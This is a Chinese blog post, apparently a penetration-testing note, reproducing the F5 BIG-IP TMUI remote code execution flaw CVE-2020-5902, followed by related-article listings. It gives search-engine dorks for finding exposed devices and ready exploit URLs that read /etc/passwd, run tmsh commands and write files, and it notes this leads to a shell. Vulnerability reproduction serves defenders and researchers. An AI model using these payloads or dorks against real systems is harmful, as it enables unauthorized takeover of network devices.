F5 BIG-IP TMUI 远程代码执行漏洞(CVE-2020-5902)

最新推荐文章于 2022-12-13 18:34:29 发布
最新推荐文章于 2022-12-13 18:34:29 发布
阅读量741 收藏
点赞数
分类专栏: Web安全渗透测试笔记 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44110340/article/details/107535015
版权
一、漏洞详情

近日,绿盟科技监测到F5官方对流量管理用户界面(TMUI)远程代码执行漏洞(CVE-2020-5902)的安全公告进行了更新。受影响的15.x版本变更为15.0.0-15.1.0,更新了可被绕过的临时缓解措施及验证方法;未经身份验证的攻击者通过BIG-IP管理端口或自身IP访问TMUI,可构造恶意请求获取目标服务器权限,CVSS评分为10分。目前msf已经集成了该漏洞的利用,建议还未修复的用户尽快采取措施进行防护。

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

二、 影响范围

受影响版本
F5 BIG-IP 15.x:15.0.0 - 15.1.0
F5 BIG-IP 14.x:14.1.0 - 14.1.2
F5 BIG-IP 13.x:13.1.0 - 13.1.3
F5 BIG-IP 12.x:12.1.0 - 12.1.5
F5 BIG-IP 11.x:11.6.1 - 11.6.5

不受影响版本
F5 BIG-IP 15.x:15.1.0.4
F5 BIG-IP 14.x:14.1.2.6
F5 BIG-IP 13.x:13.1.3.4
F5 BIG-IP 12.x:12.1.5.2
F5 BIG-IP 11.x:11.6.5.2

三、 环境搭建、网络空间探测

到官网这个页面选择你想要下载的版本:
https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v15.x

以下是F5 BIG-IP设备在各大检索平台的检索规则

shodan
http.favicon.hash:-335242539

http.title:“BIG-IP&reg ;- Redirect”

fofa
title=“BIG-IP&reg ;- Redirect”

censys
443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5

443.https.get.title:“BIG-IP&reg ;- Redirect”

google
inurl:“tmui/login.jsp”

intitle:“BIG-IP” inurl:“tmui”

四、漏洞复现

读取文件 Read File

/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

在这里插入图片描述

执行命令 RCE

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

在这里插入图片描述

写入文件 Upload File & 查看文件内容 File Read

/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/22&content=hello tiger!

读取/tmp/22文件是否写入
在这里插入图片描述

按照这个思路即可上传木马,getshell。

半只特立独行的猪
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
F5 BIG-IP 存在远程命令执行漏洞(CVE-2022-1388)
nnn2188185的博客
05-06 592
F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过 BIG-IP 中的 iControl REST 身份验证来控制受影响的系统。 可造成远程命令执行漏洞
CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞
weixin_51387754的博客
11-03 407
漏洞简介 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 近日,F5发布了F5 BIG-IQ/F5 BIG-IP 代码执行代码执行的风险声明,F5安全公告更新了BIG-IP,BIG-IQ中的多个严重漏洞。建议广大用户及时将f5 big-iq,f5 big-ip升级到最新版本,避免遭到攻击。 影响版本: F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x: 14.1
F5 BIG-IP TMUI 远程代码执行(CVE-2020-5902)
mei_13的博客
07-08 597
1.1 漏洞描述: 在F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2020年7月1日,F5官方公布流量管理用户界面(TMUI)存在 前台远程执行代码(RCE)漏洞CVE-2020-5902)。攻击者利用该漏洞,构造恶意请求,在未授权的情况下通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 1.2 影响范围
F5 BIG-IP TMUI远程代码执行漏洞批量扫描(CVE-2020-5902)
qq_42267685的博客
07-14 513
F5 BIG-IP TMUI远程代码执行漏洞扫描(CVE-2020-5902) F5 BIG-IP TMUI远程代码执行在我当前工作环境中做了次测试,发现还是非常常见的。文件读写就基本属于必中的。 F5 BIG-IP TMUI远程代码执行 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 CVE-2020-5902手工测试的文章网上有很多我就不复制粘贴了,因F5机器较多,为了偷懒写了
【更新通告】F5 BIG-IP TMUI 远程代码执行漏洞CVE-2020-5902)通告
爱国小白帽
07-12 934
【更新通告】F5 BIG-IP TMUI 远程代码执行漏洞CVE-2020-5902)通告 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天 来自专辑 历史重要漏洞通告及处置手册汇总 通告编号:NS-2020-0040-1 2020-07-12 TA****G: F5、TMUICVE-2020-5902、官方公告更新 漏洞危害: ****攻击者利用此漏洞,可实现远程代码执行。****** 版本: **1.1 ** 1 漏洞概述 近日,
CVE-2020-5902:F5 BIG-IP TMUI远程代码执行漏洞复现
Jietewang的博客
11-23 1271
BIG-IP是F5公司制造的一款多功能网络设备,设备经配置后可作为流量控制系统、负载平衡器、防火墙、访问网关、速率限制器或SSL中间件。基础信息FOFA指纹:title=”BIG-IP®-Redirect”下载地址:https://downloads.f5.com/esd/eula.sv?
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞.md
04-23
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞
CVE-2020-5902的概念证明-Linux开发
05-27
BIG-IP版本15.0.0-15.1.0.3、14.1.0-14.1.2.5、13.1.0-13.1.3.3、12.1.0-12.1.5.1和11.6.1-11.6.5.1中,流量管理用户接口(TMUI),也称为配置实用程序,在未公开的页面中具有远程执行代码(RCE)漏洞。...
基于UNIAPP的VUE3 TypeScript跨端组件库tmui.design设计源码
最新发布
04-16
本源码项目是基于UNIAPP的VUE3 TypeScript跨端组件库tmui.design...通过该项目,开发者可以轻松实现多平台间的代码复用和组件共享,提高开发效率和应用质量。系统界面友好,易于操作,适合用于各类跨端应用开发场景。
tm.ui.ListView:用于tmlib.js的ListView
05-16
tm.ui.ListView 用于tmlib.js的ListView 用法 基本的 var model = [ "black" , "white" , "luminous" , "bloom" , "eaglet" , ] ; var listView = ListView ( { width : 640 , ...listView .... { name : "s
MUI打包成APP详解.doc
11-08
执行命令时,你需要设定并记住一个口令,这个口令会在签名应用时使用。 ### 2. 利用HBuilder打包 HBuilder是一款强大的HTML5开发工具,支持MUI框架,并提供了便捷的打包服务。首先,你需要注册HBuilder账号,...
网络靶场实战--BIG-IP CVE漏洞分析(CVE-2022-41622)(CVE-2022-41800)
蛇矛实验室
12-13 1280
这一小节,我们简单分析了F5设备的俩个pre-auth漏洞,了解了rpm注入和csrf漏洞产生原因。并且在此过程中我们简单学习F5设备中 soap接口和rest接口的区别以及利用。蛇矛实验室成立于2020年,致力于安全研究、攻防解决方案、靶场对标场景仿真复现及技战法设计与输出等相关方向。团队核心成员均由从事安全行业10余年经验的安全专家组成,团队目前成员涉及红蓝对抗、渗透测试、逆向破解、病毒分析、工控安全以及免杀等相关领域。
漏洞通告】F5 BIG-IP TMUI 远程代码执行漏洞CVE-2020-5902)通告
爱国小白帽
07-06 1345
漏洞通告】F5 BIG-IP TMUI 远程代码执行漏洞CVE-2020-5902)通告 原创 威胁对抗能力部 [绿盟科技安全情报](javascript:void(0)???? 今天 通告编号:NS-2020-0040 2020-07-06 TA****G: F5、TMUICVE-2020-5902、EXP披露 漏洞危害: 高,攻击者利用此漏洞,可实现远程代码执行。 应急等级: 黄色 版本: 1.0 1 漏洞概述 近日,F5官方发布公告修复了一个存在于流量管理用户界面(T
F5 最新CVE漏洞说明:BIG-IP 和 BIG-IQ 的新漏洞和更新
f5networks的博客
11-04 1306
作为安全漏洞持续管理的一部分,F5 在8月24日发布了 BIG-IP 和 BIG-IQ 的新漏洞和更新。对漏洞及时披露和有效补救是我们安全实践的核心诉求,这反映了我们保持警惕并专注于不断改进的不懈努力。
【负载均衡】揭开F5 BIG-IP的神秘面纱(一)
weixin_33795806的博客
05-14 1554
负载均衡的门槛越来越低,能够制造与生产厂商也越来越多。 这里不谈性能评测,只谈实现方式。其实他们的性能越来越接近,差距也在逐渐缩短。 F5 BIG-IP 3900 cpu [root@F5:Active] config # cat /proc/cpuinfo processor : 0 vendor_id : ...
F5 BIG-IP CVE-2020-5902 漏洞利用
weixin_46137328的博客
07-07 457
0x00 漏洞概述7月1日,F5发布公告,其流量管理用户接口(Traffic Management User Interface ,简称TMUI),也称为配置实用程序(Configura...
BIG-IP ADC RCE漏洞(CVE-2020-5902)
Azjj
07-08 519
BIG-IP ADC RCE漏洞(CVE-2020-5902) F5(F5 Networks)作为全球领先的应用交付网络(ADN)领域的厂商,6月被曝出BIG-IP(负载均衡)中两个严重漏洞,代号分别为CVE-2020-5902和CVE-2020-5903,就在上次HW期间,就见到过很多这个F5的设备,金融企业存在这种高危漏洞,想想都可怕。 一丶漏洞简介   该漏洞BIG-IP管理界面中称为“远程代码执行漏洞,称为TMUI(流量管理用户界面)。未经身份验证的攻击者可以通过将恶意制作的HTTP请
F5 BIG-IP远程代码执行漏洞CVE-2020-5902)
chaojixiaojingang
08-21 1798
1.影响范围 F5 BIG‐IP 15.1.0 F5 BIG‐IP 15.0.0 F5 BIG‐IP 14.1.0‐14.1.2 F5 BIG‐IP 13.1.0‐13.1.3 F5 BIG‐IP 12.1.0‐12.1.5 F5 BIG‐IP 11.6.1‐11.6.5 2.漏洞描述 攻击者可利用该漏洞执行任意系统命令、创建或删除文件、禁用服务、执行任意的Java代码,可获取shell完全控制目标系统。 存在漏洞目标网站页面: 3.网络资产查找 (1)shodan ...
gitlab-runner 执行权限不够_F5 BIG-IP 远程代码执行漏洞CVE-2020-5902) 漏洞利用
weixin_35327824的博客
12-26 392
0x01 漏洞详情最近各大平台都在推送F5 BIG-IP 远程代码执行漏洞漏洞编号为CVE-2020-5902。BIG-IP ADC广泛应用于大型企业,数据中心、云计算平台中,可以实现应用加速、负载均衡、SLL过载、web应用防火墙等功能。未认证的攻击者可以通过发送伪造的恶意HTTP请求到含有TMUI工具的具有漏洞的服务器来远程利用该漏洞。成功利用该漏洞可以完全控制设备的管理员权限,无需授权就可...
tmui fetch统一配置
06-09
对于 TMUI Fetch 的统一配置,您可以在 BIG-IP 系统的 CLI(命令行界面)中使用以下命令: 1. 创建一个名为 `fetch_global` 的全局变量: ``` tmsh create sys global-settings variables add { fetch_global { } ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值